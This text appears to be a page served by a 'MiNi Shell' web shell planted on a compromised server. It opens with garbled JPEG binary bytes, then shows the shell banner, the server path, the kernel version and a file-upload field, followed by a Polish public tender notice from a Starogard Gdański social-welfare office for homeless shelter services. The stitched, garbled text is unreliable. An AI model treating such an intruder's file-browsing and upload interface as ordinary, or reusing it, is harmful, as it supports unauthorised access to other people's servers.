JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230511/0021220601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie dla osób bezdomnych z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">w Starogardzie Gdańskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002841092</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Jana Pawła II 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starogard Gdański</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mops.starogard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.mops.starogard.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie dla osób bezdomnych z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0a958e0c-eb39-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00212206</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00050507/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługi schronienia dla osób bezdomnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/starogard_gdanski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/starogard_gdanski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.	Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>	Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/> 3.	Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/> 4.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/> 5.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.;<br/>d)	włączona obsługa JavaScript;<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>f)	Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/> 6.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący;<br/>b)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/> 7.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/> 8.	Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Administratorem państwa danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będzie Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim, Al. Jana Pawła II 6, 83-200 Starogard Gdański.<br/> 2.	Wyznaczyliśmy inspektora ochrony danych. Jest to osoba, z którą mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. Z inspektorem ochrony danych mogą się Państwo kontaktować:<br/>a)	telefonicznie: 537-005-680,<br/>b)	elektronicznie: iod.jednostki@um.starogard.pl.<br/> 3.	Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postępowaniu oraz następujące przepisy prawa:<br/>a)	ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych;<br/>b)	ustawa o narodowym zasobie archiwalnym i archiwach.<br/> 4.	Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane będą przez okres 5 lat.<br/> 5.	Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do Państwa danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 8 ust 4 pkt 1 i 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o za mówienie publiczne mogą być podmioty z którymi Administrator danych zawarł umowy lub porozumienie na korzystanie z udostępnianych przez nie systemów informatycznych w zakresie przekazywania lub archiwizacji danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/> 6.	W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa dane mogą być przekazywane do państw z poza EOG z zastrzeżeniem, o którym mowa w ustępie 5.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7.	W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego przysługują Państwu następujące uprawnienia:<br/>a)	prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>b)	prawo do sprostowania (poprawiania) swoich danych;<br/>c)	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; <br/>d)	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw,<br/>e)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/> 8.	Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie przepisów ustawy Prawo zamówień publicznych oraz wydanych do niej przepisów wykonawczych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia dla 14 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o 7 osób) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odległość schroniska od siedziby Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług schronienia dla 6 bezdomnych mężczyzn (z możliwością zwiększenia liczby osób skierowanych o 3 osoby) z terenu miasta Starogard Gdański w zakresie pomocy społecznej polegającej na udzieleniu tymczasowego schronienia i innych usług zgodnie z art. 48 i 48a ustawy z dnia 12 marca 2014r. o pomocy społecznej (Dz. U. z 2020 poz. 1876 ze zm.)<br/> 3.	Wymagania Osoby, którym ma być udzielone schronienie będą umieszczane w schroniskach po wcześniejszym ustaleniu terminu, na podstawie imiennego skierowania wystawionego przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim. W szczególnie uzasadnionych przypadkach dopuszcza się podjęcie świadczenia usług w oparciu o dane przekazane faksem, telefonicznie lub e-mailem. W szczególnych przypadkach dopuszcza się, że Kierownik ustala skierowanie telefonicznie, a dokumentacja jest uzupełniona w ciągu 2 dni roboczych.<br/> 4.	Schronisko powinno:<br/>a)	świadczyć schronienie całodobowo,<br/>b)	prowadzić rejestr osób korzystających z pomocy placówki, skierowanych przez Miejski Ośrodek Pomocy Społecznej w Starogardzie Gdańskim,<br/>c)	realizować pracę socjalną, w tym indywidualne programy wychodzenia z bezdomności,<br/>d)	zapewnić:<br/>•	trzy posiłki dziennie w tym jeden gorący dla osób dorosłych, dla dzieci dodatkowo czwarty posiłek: podwieczorek;<br/>•	podstawowe środki higieny osobistej, zmianę odzieży na czystą oraz możliwość wyprania brudnej odzieży i wysuszenia;<br/>•	dezynfekcję i dezynsekcję odzieży w przypadku braku możliwości jej wymiany;<br/>•	właściwe warunki socjalno-bytowe i nieskrępowany dostęp do pomieszczeń sanitarnych;<br/>•	kontakt z lekarzem pierwszego kontaktu i placówkami ochrony zdrowia, leki przeciwbólowe i przeciw przeziębieniu;<br/>•	poczucie bezpieczeństwa na terenie placówki, poszanowanie godności osobistej; <br/>•	informacje o dostępnych formach pomocy społecznej, a w razie potrzeby wsparcie w jej zorganizowaniu;<br/>•	pomoc prawną i psychologiczną;<br/>e)	współpracować z MOPS w realizacji indywidualnych programów wychodzenia z bezdomności.<br/>f)	nie później niż 3 dni od zdarzenia, pisemnie informować o:<br/>•	usunięciu osoby bezdomnej z placówki z podaniem uzasadnienia,<br/>•	opuszczeniu przez osobę bezdomną schroniska.<br/> 6.	Placówki świadczące wyżej wymienione wsparcie dla osób bezdomnych powinny spełniać standardy określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej z dnia 27 kwietnia 2018r. w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni (Dz. U. z 2018r. poz. 896), zwanym dalej Rozporządzeniem.<br/> 7.	Zamawiający zastrzega, że podana liczba osób, które zostaną skierowane do schroniska wraz z możliwością zwiększenia tej liczby ma charakter szacunkowy i jest efektem dokonanej przez Zamawiającego analizy na podstawie lat ubiegłych. Faktyczna liczba osób, które zostaną skierowane do schroniska dla osób bezdomnych może się różnić od liczb wskazanych w ust. 2. Zamawiający zastrzega sobie prawo niewyczerpania całego zakresu przedmiotu zamówienia jak i jego zwiększenia w zależności od potrzeb Zamawiającego oraz możliwości Wykonawcy.<br/> 8.	Zamawiający dopuszcza możliwość dodania do wzoru umowy jako załącznik regulaminu obowiązującego w schronisku pod warunkiem, że jego zapisy nie stoją w sprzeczności z postanowieniami umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-07-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> 